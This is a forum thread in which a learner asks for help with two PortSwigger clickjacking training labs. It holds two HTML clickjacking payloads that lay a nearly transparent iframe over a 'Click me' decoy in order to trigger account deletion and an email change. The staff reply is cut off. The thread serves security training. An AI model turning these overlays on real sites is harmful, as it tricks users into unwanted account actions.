The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Clickjacking: First 2 labs -> problem solving

Alberto | Last updated: Mar 16, 2021 11:39AM UTC

Hi, I'm doing the first 2 labs of Clickjacking.

1) Lab: Basic clickjacking with CSRF token protection
2) Lab: Clickjacking with form input data prefilled from a URL parameter

In the first one, I did everything like the solution:

<style>
    iframe {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:610px;
        left:70px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="UrlOfMyLab/my-account?id=wiener"></iframe>

I clicked on Store, then checked with View Exploit and the "click me" is over the Delete Button. Then, if I press on "Deliver exploit to victim" I still don't get "Lab Solved".

Before reading the solution I made a mistake pressing on "Click me", because I deleted the account and still didn't get "Solved".

Same problem with the second lab.

<style>
    iframe {
        position:relative;
        width: 500px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:530px;
        left:70px;
        z-index: 1;
    }
</style>
<div> Click me</div>
<iframe src="UrlOfMyLab/my-account?id=wiener&email=prova@prova.it"></iframe>

I clicked on Store, then checked with View Exploit and the "click me" is over the Change Email Button. Then, if I press on "Deliver exploit to victim" I still don't get "Lab Solved".

In this case I pressed on Click Me and I can see the email has changed.

Ben, PortSwigger Agent | Last updated: Mar 17, 2021 02:40PM UTC